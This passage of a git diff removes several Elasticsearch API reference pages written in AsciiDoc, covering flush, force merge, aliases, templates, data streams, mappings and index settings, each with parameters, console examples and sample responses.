You can then use the delete index API to delete the -previous write index. --- - - -[[delete-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] diff --git a/docs/reference/indices/flush.asciidoc b/docs/reference/indices/flush.asciidoc deleted file mode 100644 index 9601476412b..00000000000 --- a/docs/reference/indices/flush.asciidoc +++ /dev/null @@ -1,142 +0,0 @@ -[[indices-flush]] -=== Flush API -++++ -Flush -++++ - -Flushes one or more data streams or indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_flush --------------------------------------------------- -// TEST[setup:my_index] - - -[[flush-api-request]] -==== {api-request-title} - -`POST //_flush` - -`GET //_flush` - -`POST /_flush` - -`GET /_flush` - - -[[flush-api-desc]] -==== {api-description-title} - -Flushing a data stream or index is the process of making sure that any data that is currently -only stored in the <> is also -permanently stored in the Lucene index. When restarting, {es} replays any -unflushed operations from the transaction log into the Lucene index to bring it -back into the state that it was in before the restart. {es} automatically -triggers flushes as needed, using heuristics that trade off the size of the -unflushed transaction log against the cost of performing each flush. - -Once each operation has been flushed it is permanently stored in the Lucene -index. This may mean that there is no need to maintain an additional copy of it -in the transaction log, unless <>. The transaction log is made up of multiple files, -called _generations_, and {es} will delete any generation files once they are no -longer needed, freeing up disk space. - -It is also possible to trigger a flush on one or more indices using the flush -API, although it is rare for users to need to call this API directly. If you -call the flush API after indexing some documents then a successful response -indicates that {es} has flushed all the documents that were indexed before the -flush API was called. - - -[[flush-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to flush. -Wildcard expressions (`*`) are supported. -+ -To flush all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[flush-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`force`:: -+ --- -(Optional, Boolean) -If `true`, -the request forces a flush -even if there are no changes to commit to the index. -Defaults to `true`. - -You can use this parameter -to increment the generation number of the transaction log. - -This parameter is considered internal. --- - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`wait_if_ongoing`:: -+ --- -(Optional, Boolean) -If `true`, -the flush operation blocks until execution -when another flush operation is running. 
- - -If `false`, -{es} returns an error -if you request a flush -when another flush operation is running. - -Defaults to `true`. --- - - -[[flush-api-example]] -==== {api-examples-title} - - -[[flush-api-specific-ex]] -===== Flush a specific data stream or index - -[source,console] ----- -POST /my-index-000001/_flush ----- -// TEST[s/^/PUT my-index-000001\n/] - - -[[flush-multi-index]] -===== Flush several data streams and indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_flush ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[flush-api-all-ex]] -===== Flush all data streams and indices in a cluster - -[source,console] ----- -POST /_flush ----- diff --git a/docs/reference/indices/forcemerge.asciidoc b/docs/reference/indices/forcemerge.asciidoc deleted file mode 100644 index 8c83e93a127..00000000000 --- a/docs/reference/indices/forcemerge.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[[indices-forcemerge]] -=== Force merge API -++++ -Force merge -++++ - -Forces a <> on the shards of one or more indices. -For data streams, the API forces a merge on the shards of the stream's backing -indices. - -[source,console] ----- -POST /my-index-000001/_forcemerge ----- -// TEST[setup:my_index] - - -[[forcemerge-api-request]] -==== {api-request-title} - -`POST //_forcemerge` - -`POST /_forcemerge` - - -[[forcemerge-api-desc]] -==== {api-description-title} - -Use the force merge API to force a <> on the -shards of one or more indices. Merging reduces the number of segments in each -shard by merging some of them together, and also frees up the space used by -deleted documents. Merging normally happens automatically, but sometimes it is -useful to trigger a merge manually. - -WARNING: **Force merge should only be called against an index after you have -finished writing to it.** Force merge can cause very large (>5GB) segments to -be produced, and if you continue to write to such an index then the automatic -merge policy will never consider these segments for future merges until they -mostly consist of deleted documents. This can cause very large segments to -remain in the index which can result in increased disk usage and worse search -performance. - - -[[forcemerge-blocks]] -===== Blocks during a force merge - -Calls to this API block until the merge is complete. If the client connection -is lost before completion then the force merge process will continue in the -background. Any new requests to force merge the same indices will also block -until the ongoing force merge is complete. - - -[[forcemerge-multi-index]] -===== Force merging multiple indices - -You can force merge multiple indices with a single request by targeting: - -* One or more data streams that contain multiple backing indices -* Multiple indices -* One or more index aliases that point to multiple indices -* All data streams and indices in a cluster - -Multi-index operations are executed one shard at a -time per node. Force merge makes the storage for the shard being merged -temporarily increase, up to double its size in case `max_num_segments` parameter -is set to `1`, as all segments need to be rewritten into a new one. - - -[[forcemerge-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. 
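-
-For example, the following request force merges all backing indices of a
-hypothetical data stream named `my-data-stream`. The data stream name is
-illustrative and the stream is assumed to already exist:
-
-[source,console]
-----
-POST /my-data-stream/_forcemerge
-----
-// TEST[skip:assumes an existing data stream]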
- - -[[forcemerge-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`flush`:: -(Optional, Boolean) -If `true`, -{es} performs a <> on the indices -after the force merge. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`max_num_segments`:: -+ --- -(Optional, integer) -The number of segments to merge to. -To fully merge indices, -set it to `1`. - -Defaults to checking if a merge needs to execute. -If so, executes it. --- - -`only_expunge_deletes`:: -+ --- -(Optional, Boolean) -If `true`, -only expunge segments containing document deletions. -Defaults to `false`. - -In Lucene, -a document is not deleted from a segment; -just marked as deleted. -During a merge, -a new segment is created -that does not contain those document deletions. - -NOTE: This parameter does *not* override the -`index.merge.policy.expunge_deletes_allowed` setting. --- - - -[[forcemerge-api-example]] -==== {api-examples-title} - - -[[forcemerge-api-specific-ex]] -===== Force merge a specific data stream or index - -[source,console] ----- -POST /my-index-000001/_forcemerge ----- -// TEST[continued] - - -[[forcemerge-api-multiple-ex]] -===== Force merge several data streams or indices - -[source,console] ----- -POST /my-index-000001,my-index-000002/_forcemerge ----- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - - -[[forcemerge-api-all-ex]] -===== Force merge all indices - -[source,console] ----- -POST /_forcemerge ----- - - -[[forcemerge-api-time-based-index-ex]] -===== Data streams and time-based indices - -Force-merging is useful for managing a data stream's older backing indices and -other time-based indices, particularly after a -<>. -In these cases, -each index only receives indexing traffic for a certain period of time. -Once an index receive no more writes, -its shards can be force-merged to a single segment. - -[source,console] --------------------------------------------------- -POST /.ds-logs-000001/_forcemerge?max_num_segments=1 --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/.ds-logs-000001/my-index-000001/] - -This can be a good idea because single-segment shards can sometimes use simpler -and more efficient data structures to perform searches. diff --git a/docs/reference/indices/get-alias.asciidoc b/docs/reference/indices/get-alias.asciidoc deleted file mode 100644 index d9b6ee31f27..00000000000 --- a/docs/reference/indices/get-alias.asciidoc +++ /dev/null @@ -1,183 +0,0 @@ -[[indices-get-alias]] -=== Get index alias API -++++ -Get index alias -++++ - -Returns information about one or more index aliases. - -include::{es-repo-dir}/glossary.asciidoc[tag=index-alias-desc] - -[source,console] ----- -GET /my-index-000001/_alias/alias1 ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000001\/_alias\/alias1\n/] - - -[[get-alias-api-request]] -==== {api-request-title} - -`GET /_alias` - -`GET /_alias/` - -`GET //_alias/` - - -[[get-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] -+ -To retrieve information for all index aliases, -use a value of `_all` or `*`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - - -[[get-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `all`. - -`ignore_unavailable`:: -(Optional, Boolean) -If `false`, requests that include a missing index in the `` argument -return an error. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - - -[[get-alias-api-example]] -==== {api-examples-title} - -[[get-alias-api-all-ex]] -===== Get all aliases for an index - -You can add index aliases during index creation -using a <> request. - -The following create index API request creates the `logs_20302801` index -with two aliases: - -* `current_day` -* `2030`, which only returns documents -in the `logs_20302801` index -with a `year` field value of `2030` - -[source,console] --------------------------------------------------- -PUT /logs_20302801 -{ - "aliases" : { - "current_day" : {}, - "2030" : { - "filter" : { - "term" : {"year" : 2030 } - } - } - } -} --------------------------------------------------- - -The following get index alias API request returns all aliases -for the index `logs_20302801`: - -[source,console] --------------------------------------------------- -GET /logs_20302801/_alias/* --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "logs_20302801" : { - "aliases" : { - "current_day" : { - }, - "2030" : { - "filter" : { - "term" : { - "year" : 2030 - } - } - } - } - } -} --------------------------------------------------- - - -[[get-alias-api-named-ex]] -===== Get a specific alias - -The following index alias API request returns the `2030` alias: - -[source,console] --------------------------------------------------- -GET /_alias/2030 --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "logs_20302801" : { - "aliases" : { - "2030" : { - "filter" : { - "term" : { - "year" : 2030 - } - } - } - } - } -} --------------------------------------------------- - - -[[get-alias-api-wildcard-ex]] -===== Get aliases based on a wildcard - -The following index alias API request returns any alias that begin with `20`: - -[source,console] --------------------------------------------------- -GET /_alias/20* --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "logs_20302801" : { - "aliases" : { - "2030" : { - "filter" : { - "term" : { - "year" : 2030 - } - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/get-component-template.asciidoc b/docs/reference/indices/get-component-template.asciidoc deleted file mode 100644 index 52eca0b0ab8..00000000000 --- a/docs/reference/indices/get-component-template.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[[getting-component-templates]] -=== Get component template API -++++ -Get component template -++++ - -Retrieves information about one or more component templates. 
- -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_component_template/template_1 -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_component_template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_component_template/template_1 --------------------------------------------------- - -[[get-component-template-api-request]] -==== {api-request-title} - -`GET /_component-template/` - - -[[get-component-template-api-path-params]] -==== {api-path-parms-title} - -`` -(Optional, string) -Comma-separated list of component template names used to limit the request. -Wildcard (`*`) expressions are supported. - - -[[get-component-template-api-query-params]] -==== {api-query-parms-title} - -include::{docdir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=local] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-component-template-api-example]] -==== {api-examples-title} - - -[[get-component-template-api-wildcard-ex]] -===== Get component templates using a wildcard expression - -[source,console] --------------------------------------------------- -GET /_component_template/temp* --------------------------------------------------- - - -[[get-component-template-api-all-ex]] -===== Get all component templates - -[source,console] --------------------------------------------------- -GET /_component_template --------------------------------------------------- diff --git a/docs/reference/indices/get-data-stream.asciidoc b/docs/reference/indices/get-data-stream.asciidoc deleted file mode 100644 index 3b8e484d697..00000000000 --- a/docs/reference/indices/get-data-stream.asciidoc +++ /dev/null @@ -1,243 +0,0 @@ -[role="xpack"] -[[indices-get-data-stream]] -=== Get data stream API -++++ -Get data stream -++++ - -Retrieves information about one or more <>. -See <>. - -//// -[source,console] ----- -PUT /_ilm/policy/my-lifecycle-policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT /_index_template/my-index-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": {}, - "template": { - "settings": { - "index.lifecycle.name": "my-lifecycle-policy" - } - } -} - -PUT /_data_stream/my-data-stream - -POST /my-data-stream/_rollover - -PUT /_data_stream/my-data-stream_two ----- -// TESTSETUP -//// - -//// -[source,console] ----- -DELETE /_data_stream/* -DELETE /_index_template/* -DELETE /_ilm/policy/my-lifecycle-policy ----- -// TEARDOWN -//// - -[source,console] ----- -GET /_data_stream/my-data-stream ----- - -[[get-data-stream-api-request]] -==== {api-request-title} - -`GET /_data_stream/` - -[[get-data-stream-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`view_index_metadata` or `manage` <> -for the data stream. 
- -[[get-data-stream-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data stream names used to limit the request. Wildcard -(`*`) expressions are supported. If omitted, all data streams will be -returned. - -[role="child_attributes"] -[[get-data-stream-api-response-body]] -==== {api-response-body-title} - -`data_streams`:: -(array of objects) -Contains information about retrieved data streams. -+ -.Properties of objects in `data_streams` -[%collapsible%open] -==== -`name`:: -(string) -Name of the data stream. - -`timestamp_field`:: -(object) -Contains information about the data stream's `@timestamp` field. -+ -.Properties of `timestamp_field` -[%collapsible%open] -===== -`name`:: -(string) -Name of the data stream's timestamp field, which must be `@timestamp`. The -`@timestamp` field must be included in every document indexed to the data -stream. -===== - -`indices`:: -(array of objects) -Array of objects containing information about the data stream's backing -indices. -+ -The last item in this array contains information about the stream's current -<>. -+ -.Properties of `indices` objects -[%collapsible%open] -===== -`index_name`:: -(string) -Name of the backing index. For naming conventions, see -<>. - -`index_uuid`:: -(string) -Universally unique identifier (UUID) for the index. -===== - -`generation`:: -(integer) -Current <> for the data stream. This number -acts as a cumulative count of the stream's rollovers, starting at `1`. - -`status`:: -(string) -<> of the data stream. -+ -This health status is based on the state of the primary and replica shards of -the stream's backing indices. -+ -.Values for `status` -[%collapsible%open] -===== -`green`::: -All shards are assigned. - -`yellow`::: -All primary shards are assigned, but one or more replica shards are -unassigned. - -`red`::: -One or more primary shards are unassigned, so some data is unavailable. -===== - -`template`:: -(string) -Name of the index template used to create the data stream's backing indices. -+ -The template's index pattern must match the name of this data stream. See -<>. - -`ilm_policy`:: -(string) -Name of the current {ilm-init} lifecycle policy in the stream's matching index -template. This lifecycle policy is set in the `index.lifecycle.name` setting. -+ -If the template does not include a lifecycle policy, this property is not -included in the response. -+ -NOTE: A data stream's backing indices may be assigned different lifecycle -policies. To retrieve the lifecycle policy for individual backing indices, -use the <>. 
-==== - -[[get-data-stream-api-example]] -==== {api-examples-title} - -[source,console] ----- -GET _data_stream/my-data-stream* ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "data_streams": [ - { - "name": "my-data-stream", - "timestamp_field": { - "name": "@timestamp" - }, - "indices": [ - { - "index_name": ".ds-my-data-stream-000001", - "index_uuid": "xCEhwsp8Tey0-FLNFYVwSg" - }, - { - "index_name": ".ds-my-data-stream-000002", - "index_uuid": "PA_JquKGSiKcAKBA8DJ5gw" - } - ], - "generation": 2, - "status": "GREEN", - "template": "my-index-template", - "ilm_policy": "my-lifecycle-policy" - }, - { - "name": "my-data-stream_two", - "timestamp_field": { - "name": "@timestamp" - }, - "indices": [ - { - "index_name": ".ds-my-data-stream_two-000001", - "index_uuid": "3liBu2SYS5axasRt6fUIpA" - } - ], - "generation": 1, - "status": "YELLOW", - "template": "my-index-template", - "ilm_policy": "my-lifecycle-policy" - } - ] -} ----- -// TESTRESPONSE[s/"index_uuid": "xCEhwsp8Tey0-FLNFYVwSg"/"index_uuid": $body.data_streams.0.indices.0.index_uuid/] -// TESTRESPONSE[s/"index_uuid": "PA_JquKGSiKcAKBA8DJ5gw"/"index_uuid": $body.data_streams.0.indices.1.index_uuid/] -// TESTRESPONSE[s/"index_uuid": "3liBu2SYS5axasRt6fUIpA"/"index_uuid": $body.data_streams.1.indices.0.index_uuid/] -// TESTRESPONSE[s/"status": "GREEN"/"status": "YELLOW"/] diff --git a/docs/reference/indices/get-field-mapping.asciidoc b/docs/reference/indices/get-field-mapping.asciidoc deleted file mode 100644 index 1e40c6981f0..00000000000 --- a/docs/reference/indices/get-field-mapping.asciidoc +++ /dev/null @@ -1,252 +0,0 @@ -[[indices-get-field-mapping]] -=== Get field mapping API -++++ -Get field mapping -++++ - -Retrieves <> for one or more fields. For data -streams, the API retrieves field mappings for the stream's backing indices. - -This API is useful if you don't need a <> -or if an index mapping contains a large number of fields. - -[source,console] ----- -GET /my-index-000001/_mapping/field/user ----- -// TEST[setup:my_index] - - -[[get-field-mapping-api-request]] -==== {api-request-title} - -`GET /_mapping/field/` - -`GET //_mapping/field/` - - -[[get-field-mapping-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard (`*`) expressions are supported. -+ -To target all indices in a cluster, omit this parameter or use `_all` or `*`. - -``:: -(Optional, string) Comma-separated list or wildcard expression of fields used to -limit returned information. - - -[[get-field-mapping-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`include_defaults`:: -(Optional, Boolean) If `true`, the response includes default mapping values. -Defaults to `false`. - -`local`:: -deprecated:[7.8.0, This parameter is a no-op and field mappings are always retrieved locally] -(Optional, boolean) If `true`, the request retrieves information from the local -node only. Defaults to `false`, which means information is retrieved from -the master node. 
- - -[[get-field-mapping-api-example]] -==== {api-examples-title} - -[[get-field-mapping-api-basic-ex]] -===== Example with index setup - -You can provide field mappings when creating a new index. The following -<> API request creates the `publications` -index with several field mappings. - -[source,console] --------------------------------------------------- -PUT /publications -{ - "mappings": { - "properties": { - "id": { "type": "text" }, - "title": { "type": "text" }, - "abstract": { "type": "text" }, - "author": { - "properties": { - "id": { "type": "text" }, - "name": { "type": "text" } - } - } - } - } -} --------------------------------------------------- - -The following returns the mapping of the field `title` only: - -[source,console] --------------------------------------------------- -GET publications/_mapping/field/title --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "publications": { - "mappings": { - "title": { - "full_name": "title", - "mapping": { - "title": { - "type": "text" - } - } - } - } - } -} --------------------------------------------------- - -[[get-field-mapping-api-specific-fields-ex]] -===== Specifying fields - -The get mapping API allows you to specify a comma-separated list of fields. - -For instance to select the `id` of the `author` field, you must use its full name `author.id`. - -[source,console] --------------------------------------------------- -GET publications/_mapping/field/author.id,abstract,name --------------------------------------------------- -// TEST[continued] - -returns: - -[source,console-result] --------------------------------------------------- -{ - "publications": { - "mappings": { - "author.id": { - "full_name": "author.id", - "mapping": { - "id": { - "type": "text" - } - } - }, - "abstract": { - "full_name": "abstract", - "mapping": { - "abstract": { - "type": "text" - } - } - } - } - } -} --------------------------------------------------- - -The get field mapping API also supports wildcard notation. - -[source,console] --------------------------------------------------- -GET publications/_mapping/field/a* --------------------------------------------------- -// TEST[continued] - -returns: - -[source,console-result] --------------------------------------------------- -{ - "publications": { - "mappings": { - "author.name": { - "full_name": "author.name", - "mapping": { - "name": { - "type": "text" - } - } - }, - "abstract": { - "full_name": "abstract", - "mapping": { - "abstract": { - "type": "text" - } - } - }, - "author.id": { - "full_name": "author.id", - "mapping": { - "id": { - "type": "text" - } - } - } - } - } -} --------------------------------------------------- - -[[get-field-mapping-api-multi-index-ex]] -===== Multiple targets and fields - -The get field mapping API can be used to get mappings for multiple fields from -multiple data streams or indices with a single request. - -The `` and `` request path parameters both support -comma-separated lists and wildcard expressions. - -You can omit the `` parameter or use a value of `*` or `_all` to target -all data streams and indices in a cluster. - -Similarly, you can omit the `` parameter or use a value of `*` to -retrieve mappings for all fields in the targeted data streams or indices. -However, the `` parameter does not support the `_all` value. 
- -For example, the following request retrieves mappings for the `message` field in -any data stream or index named `my-index-000001` or `my-index-000002`. - -[source,console] ----- -GET /my-index-000001,my-index-000002/_mapping/field/message ----- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\n/] - -The following request retrieves mappings for the `message` and `user.id` fields -in any data stream or index in the cluster. - -[source,console] ----- -GET /_all/_mapping/field/message ----- -// TEST[setup:my_index] - -The following request retrieves mappings for fields with an `id` property in any -data stream or index in the cluster. - -[source,console] ----- -GET /_all/_mapping/field/*.id ----- -// TEST[setup:my_index] diff --git a/docs/reference/indices/get-index-template-v1.asciidoc b/docs/reference/indices/get-index-template-v1.asciidoc deleted file mode 100644 index 7b6d30bee89..00000000000 --- a/docs/reference/indices/get-index-template-v1.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ -[[indices-get-template-v1]] -=== Get index template API -++++ -Get index template (legacy) -++++ - -IMPORTANT: This documentation is about legacy index templates, -which are deprecated and will be replaced by the composable templates introduced in {es} 7.8. -For information about composable templates, see <>. - -Retrieves information about one or more index templates. - -//// -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns" : ["te*"], - "settings": { - "number_of_shards": 1 - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _template/template_1 --------------------------------------------------- -// TEARDOWN - -//// - -[source,console] --------------------------------------------------- -GET /_template/template_1 --------------------------------------------------- - - -[[get-template-v1-api-request]] -==== {api-request-title} - -`GET /_template/` - - -[[get-template-v1-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-template] -+ -To return all index templates, omit this parameter -or use a value of `_all` or `*`. 
- - -[[get-template-v1-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-template-v1-api-example]] -==== {api-examples-title} - - -[[get-template-v1-api-multiple-ex]] -===== Get multiple index templates - -[source,console] --------------------------------------------------- -GET /_template/template_1,template_2 --------------------------------------------------- - - -[[get-template-v1-api-wildcard-ex]] -===== Get index templates using a wildcard expression - -[source,console] --------------------------------------------------- -GET /_template/temp* --------------------------------------------------- - - -[[get-template-v1-api-all-ex]] -===== Get all index templates - -[source,console] --------------------------------------------------- -GET /_template --------------------------------------------------- diff --git a/docs/reference/indices/get-index-template.asciidoc b/docs/reference/indices/get-index-template.asciidoc deleted file mode 100644 index f38d237c38e..00000000000 --- a/docs/reference/indices/get-index-template.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[indices-get-template]] -=== Get index template API [[getting-templates]] -++++ -Get index template -++++ - -Returns information about one or more index templates. - -//// - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["te*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _index_template/template_* --------------------------------------------------- -// TEARDOWN - -//// - -[source,console] --------------------------------------------------- -GET /_index_template/template_1 --------------------------------------------------- - -[[get-template-api-request]] -==== {api-request-title} - -`GET /_index_template/` - - -[[get-template-api-path-params]] -==== {api-path-parms-title} - -include::{docdir}/rest-api/common-parms.asciidoc[tag=index-template] -+ -To retrieve all index templates, omit this parameter or use a value of `*`. 
- - -[[get-template-api-query-params]] -==== {api-query-parms-title} - -include::{docdir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{docdir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-template-api-example]] -==== {api-examples-title} - - -[[get-template-api-wildcard-ex]] -===== Get index templates using a wildcard expression - -[source,console] --------------------------------------------------- -GET /_index_template/temp* --------------------------------------------------- - - -[[get-template-api-all-ex]] -===== Get all index templates - -[source,console] --------------------------------------------------- -GET /_index_template --------------------------------------------------- diff --git a/docs/reference/indices/get-index.asciidoc b/docs/reference/indices/get-index.asciidoc deleted file mode 100644 index b0f4dcbde41..00000000000 --- a/docs/reference/indices/get-index.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[indices-get-index]] -=== Get index API -++++ -Get index -++++ - -Returns information about one or more indices. For data streams, the API -returns information about the stream's backing indices. - -[source,console] --------------------------------------------------- -GET /my-index-000001 --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. Although mappings -in responses no longer contain a type name by default, you can still request the old format -through the parameter include_type_name. For more details, please see <>. - - -[[get-index-api-request]] -==== {api-request-title} - -`GET /` - - -[[get-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[get-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-defaults] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -`ignore_unavailable`:: -(Optional, Boolean) -If `false`, requests that target a missing index return an error. Defaults to -`false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] diff --git a/docs/reference/indices/get-mapping.asciidoc b/docs/reference/indices/get-mapping.asciidoc deleted file mode 100644 index a68b7edd5ed..00000000000 --- a/docs/reference/indices/get-mapping.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -[[indices-get-mapping]] -=== Get mapping API -++++ -Get mapping -++++ - -Retrieves <> for one or more indices. For data -streams, the API retrieves mappings for the stream's backing indices. 
- -[source,console] --------------------------------------------------- -GET /my-index-000001/_mapping --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. Although mappings -in responses no longer contain a type name by default, you can still request the old format -through the parameter `include_type_name`. For more details, please see <>. - - -[[get-mapping-api-request]] -==== {api-request-title} - -`GET /_mapping` - -`GET //_mapping` - - -[[get-mapping-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[get-mapping-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-mapping-api-example]] -==== {api-examples-title} - -[[get-mapping-api-multi-ex]] -===== Multiple data streams and indices - -The get mapping API can be used to get more than one data stream or index with a -single call. General usage of the API follows the following syntax: -`host:port//_mapping` where `` can accept a comma-separated -list of names. To get mappings for all data streams and indices in a cluster, use `_all` or `*` for `` -or omit the `` parameter. -The following are some examples: - -[source,console] --------------------------------------------------- -GET /my-index-000001,my-index-000002/_mapping --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -If you want to get mappings of all indices in a cluster, the following -examples are equivalent: - -[source,console] --------------------------------------------------- -GET /*/_mapping - -GET /_all/_mapping - -GET /_mapping --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/indices/get-settings.asciidoc b/docs/reference/indices/get-settings.asciidoc deleted file mode 100644 index f655a7ff18a..00000000000 --- a/docs/reference/indices/get-settings.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[[indices-get-settings]] -=== Get index settings API -++++ -Get index settings -++++ - -Returns setting information for one or more indices. For data streams, the API -returns setting information for the stream's backing indices. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_settings --------------------------------------------------- -// TEST[setup:my_index] - - -[[get-index-settings-api-request]] -==== {api-request-title} - -`GET //_settings` - -`GET //_settings/` - - -[[get-index-settings-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data 